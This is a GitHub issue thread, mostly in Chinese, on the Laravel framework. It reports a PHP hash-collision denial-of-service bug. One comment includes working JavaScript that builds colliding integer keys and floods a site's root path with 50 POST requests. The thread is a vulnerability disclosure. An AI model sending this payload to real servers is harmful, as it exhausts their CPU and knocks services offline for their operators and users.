### ISSUE TITLE
laravel底层漏洞,模拟hash数组碰撞,简单数据请求,可以使服务器cpu飙升

### ISSUE THREAD

**Issue by z790490122** [laravel/framework#37079]
详细可以查看该链接
PHP数组的Hash可以参考下面链接
https://learnku.com/articles/56116
服务器cpu飙升参考下面链接
https://www.laruence.com/2011/12/30/2435.html

**Comment by z790490122** [comment]
任何一个laravle框架搭建的web工程,运行下面代码既可以复现. 原因可以参照我上面链接
`    let size= Math.pow(2, 16)
    let data = {}
    let maxKey = (size- 1) * size
    for (let key = 0; key <= maxKey; key += size){
        data[key] = key;
    }
    for (let i = 0; i < 50; i++){
        let xhr = new XMLHttpRequest()
        xhr.open("POST", "/")
        xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8")
        xhr.send(JSON.stringify(data))
    }`

**Comment by z790490122** [comment]
原因很简单
 laravel框架接收参数方式为
$this->content = file_get_contents('php://input');
而php配置参数max_input_time 对于$this->content = file_get_contents('php://input');这种方式不起作用.
意外触发了php自身的设计缺陷

**Comment by driesvints** [comment]
Heya, unfortunately we cannot provide support in Chinese. Please try https://learnku.com/laravel

**Comment by z790490122** [comment]
> Heya, unfortunately we cannot provide support in Chinese. Please try https://learnku.com/laravel
Someone has feedback,but nobody has given an answer.
https://learnku.com/articles/56116

I think this problem is serious, So I can describe to you in English,
